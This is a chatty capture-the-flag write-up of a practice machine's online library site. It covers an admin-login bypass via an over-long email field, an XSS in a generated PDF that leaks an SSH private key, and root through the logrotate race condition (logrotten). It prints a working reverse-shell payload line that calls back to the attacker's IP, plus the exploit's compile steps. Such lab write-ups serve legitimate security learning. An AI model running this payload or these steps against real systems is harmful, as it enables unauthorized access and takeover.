1. Executive Summary
Given address (10.10.10.176) is website for online library with someone able to sign up and login as user. However the website has vulnerability that people can login as admin and compromise the website.
In this case there are three suspects for security breach in the library. These vulnerabilities are unsanitized user input lead to bypass admin authentication, local file read via xss in dynamically generated pdf, and race condition in logrotate utility.
2. Description
2.1 Enumeration
On today class I tried to identify the services that ran in the machine, by using nmap as usual. (I mean duh nmap is like primer in makeup).
Then I tried to access the URL in browser which lead to page of login. It also has sign up feature for those user who don’t have account there. Since the girl didn’t have any account there, I signed up with “rarpunzel” account (name : rarpunzel; email : rarpunzel@book.htb; password : rarpunzel) and signed in.
Before we take further dive. Here is some closure look of the website.
a. home.php
b. books.php
c. collections.php
d. contact.php
From these four main menu I found admin’s email which is in contact us menu. I used magic tool called dirb to search for hidden web object. And simsalabim! from there “admin” directory is discovered.
Admin directory…who couldn’t fall from that? like you found a hope in hopeless place lmao, with credential rarpunzel earlier, I tried to access http://10.10.10.17/admin/index.html which refer me to admin login page. The website is asking for admin login with email and password field. Since we already have valid email for admin. The only thing left is password.
How can we get admin password? My silly brain start typing the most common password “admin” and logged in with email “admin@book.htb” but of course this machine is smarter than me. They gave me “Nope” as rejection.
SO after taking few sips of coffee, I decided to re-sign up admin account with credential of valid email account (“name: admin”; email: “admin@book.htb”; password: “rarpunzel”) and logged in back to http://10.10.10.176/admin/index.php
And…………
They still reply me with “Nope”
Later on I analyzed the source code of login and sign up with inspect element. If you don’t know what is inspect element just press ctrl+shift+I.
2.2 Exploitation
While analyzing the source code, I manage to find fun fact that there is javascript in email field which set the limit of character expected in this case is 20 with adding arbitrary character.
My Mom always told me to be good girl and obey the rules, but not now Mom. I’m going to be bad girl by inputing 21 character inside the email field.
By using burp, I intercept GET request and re-signed up with modified credential (“name: admin”; email: “admin@book.htb******C”; password: “rarpunzel”). PS : the star represent space, if you want to use the same credential, dont forget to replace star symbol with space.
With the credential above, I tried to login form http://10.10.10.176/admin/index.php but keep getting “Nope” message.
So I’m back to sign up, by using burp, as new account with other credential input as follow,( name: “admin5”; email: “admin@book.htb******C”; password: “rarpunzel”).
Why admin5? cause admin1,admin2,admin3,admin4 are getting kicked out as well lmao
I tried to login back as admin5 but in login I don’t modify the email into 21 character in http://10.10.10.176/admin/index.php .
PS : this step is kinda annoying… so here is some tips. first you need to sign up as admin and admin5 in /index.php and then you should login to /admin/index.php using email: “admin@book.htb”; password: “rarpunzel”. since both of these account used same email.
As I manage to logged in as admin, I have to act like admin right? So I tried to take look at every menu to find if there is differentiation. Here is a sneak peek of admin’s menu.
Note: in /admin/collections.php attacker able to download pdf. This pdf contains the list of the book uploaded by user.
So I logged in in another window as rarpunzel to upload something. After countless try, I figured it out that the pdf is updated dynamically. Only the latest upload can be download by admin. Thus as rarpunzel I tried to perform xss (no not extra small small but cross site scripting) by filling book title and author field with a script :
Oh and I copied the script into a blank pdf.
With these three component filled with a script, I’m back to admin5 and downloaded the pdf.
And from there I gained information about user reader in the machine.
As we already figured about reader, I performed the same xss method but with different script. (Put the script into book name,author and pdf).
From the screenshot below attacker received private key for “reader”.
It should be note that there is some string cut in private key so it cannot be used. This happen due to the size of text is larger than the pdf container. So attacker decided to make the text smaller by modifying the script.
Hence the right private key successfully obtained and ready to use. To use the private key, attacker convert the pdf to txt by using online converter https://pdftotext.com/.
After gaining complete version private key of reader, using SSH, I logged in as reader. (PS: don’t forget to change permission, use chmod 600 for read and write permission).
Inside reader there is user.txt which can be accessed right away. I did not expect that there is flag in front of the door actually…
2.3 Privilege Escalation
After gaining user flag, it is time for us to do privillege escalation. The most fun and exciting activity in today’s scenario!!!!
There is magic tool called LinPEAS (Linux Privilege Escalation Awesome Script) to give you huge push to escalate the privilege. By using LinPEAS, I can get information about writable log files running on machine which called logrotten.
Logrotten is infamous name for insecure logrotate. And logrotate itself is a system utility that manages the automatic rotation and compression of log files. If log files were not rotated, compressed, and periodically pruned, they could eventually consume all available disk space on a system. Normally, logrotate is run as a daily cron job. It will not modify a log more than once in one day unless the criterion for that log is based on the log’s size and logrotate is being run more than once each day.
According to https://github.com/whotwagner/logrotten logrotate is insecure for :
- logrotate is prone to a race condition after renaming the logfile.
- If logrotate is executed as root, with option that creates a file ( like create, copy, compress, etc.) and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
- An attacker could elevate his privileges by writing reverse-shells into directories like “/etc/bash_completition.d/”.
Easier explanation here : https://hackerone.com/reports/578119
Based on manual in github to do the privillege escalation, there are two things to prepare.
First, the exploit = logrotten.c
I compiled the code and save it to new file named logrotate with command in below.
gcc -o logrotate logrotate.c
Second let’s not forget the payload that already given by good guys from the github. I saved it as payloadfile.
if [ `id -u` -eq 0 ]; then (bash -i >& /dev/tcp/10.10.14.2/1234 0>&1 &); fi
Before getting any further don’t forget to change the permission into executable file with command as seen in the below.
chmod+x logrotate payloadfile.
Now that we are set. Let’s turn on the listener to our machine.
Listener is done, next the exploit.
After the exploit is successfully running, what we need to do is to trigger the exploit. Triggered it by adding some random string to the log file.
So the step is run the exploit -> modify the log -> watch the listener. PS : The exploit take multiple try to be able to caught by listener.
After gaining access to shell, I figured out that there is limited time to access it. So we have to extremely fast or we have to deal with more “triggering exploit” activity.
Ending : I (finally) get the flag of root.
